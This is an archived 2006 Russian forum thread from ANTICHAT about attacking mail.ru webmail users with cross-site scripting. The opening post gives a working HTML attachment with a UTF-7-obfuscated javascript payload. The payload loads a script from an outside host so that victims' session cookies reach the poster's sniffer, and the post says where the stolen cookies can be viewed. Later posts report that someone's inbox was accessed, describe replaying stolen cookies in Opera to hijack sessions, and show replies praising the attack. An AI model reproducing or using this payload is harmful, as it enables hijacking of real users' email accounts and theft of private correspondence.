ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.10.2006, 15:00
|
|
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074
Репутация:
74
|
|
XSS на mail.ru
Взлом Майл.ру
жертва должна будет скачать и открыть прикреплённый файл в хтмл формате
<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
<TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')">
</html>
куки придут на мой сниффер
вы можете воспользоваться ими по адресу: www.devarsiv.org/alex/alex.php
сейчас сделаю видео !
удачи!
Последний раз редактировалось Actu@l SpY; 07.10.2006 в 01:32..
|
|
|
06.10.2006, 15:30
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807
Репутация:
901
|
|
Actu@l SpY
Круто нафиг!  . Давай видео !!! )
|
|
|
|
06.10.2006, 15:36
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Отлично!
|
|
|
|
06.10.2006, 15:45
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Сделав как описанно выше на сниффер пришло следующее:
"REFERER=http://win.mail.ru/cgi-bin/readmsg/1.html?id=11601349480000001767;0;1&mode=attachment &channel=¬ype"
Что-то не так делаю или что?
Ведь сессии самой то нет...
|
|
|
|
07.10.2006, 01:16
|
|
Постоянный
Регистрация: 16.06.2006
Сообщений: 334
Провел на форуме:
1732994
Репутация:
600
|
|
Если сработает то будет круто.... а сниф может не сработать? иногда бывает что приходит пустые логи..
|
|
|
|
07.10.2006, 01:24
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Если я ничего не путаю, то я вижу следующее:
Примеры, которые привел Actu@l SpY не будут работать хотя бы по той причине, что пути такого как "http://win.mail.ru/session/......" нет уже...в данный момент "http://win.mail.ru/cgi-bin/..."
Сессию сниффер никак не может утянуть...
По крайней мере у меня не получилось, хотел делал точно все так, как описано выше...
Может подскажите в чем моя ошибка?
Последний раз редактировалось Koller; 07.10.2006 в 01:28..
|
|
|
|
07.10.2006, 01:44
|
|
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074
Репутация:
74
|
|
до того момента как я выложил багу на форуме всё работало,
буквально через 30 минут,эту багу прикрыли ,остался только вариант через мой сниффер и то по непонятным причинам попасть в инбокс через оперу по свежим кукам стало проблематично
|
|
|
|
07.10.2006, 01:55
|
|
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074
Репутация:
74
|
|
nc.STRIEM подтвердит, что сегодня он побывал у меня-же в инбоксе,приведённым мной вариантом,,а через пол чеса облом, багу видимо прикрыли,но всё-же подменив куки в опере мы попадем в инбокс,на то время пока жертва будет в он-лине
Последний раз редактировалось Actu@l SpY; 07.10.2006 в 03:07..
|
|
|
|
07.10.2006, 12:37
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807
Репутация:
901
|
|
Actu@l SpY
Ну это для нас давно не секрет, что люди с mail.ru тоже тут тусуються, потому как бы стараемся что-то свеженькое и горячее переносить в закрытую зону.
P.S. В этот раз меня терзали смутные сомнения, убрать ли тему выше или оставить тут. Оставил ). Результат на лицо
|
|
|
|
07.10.2006, 12:39
|
|
Участник форума
Регистрация: 26.11.2005
Сообщений: 193
Провел на форуме:
1260231
Репутация:
40
|
|
Круто чувак.Ждем видео.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
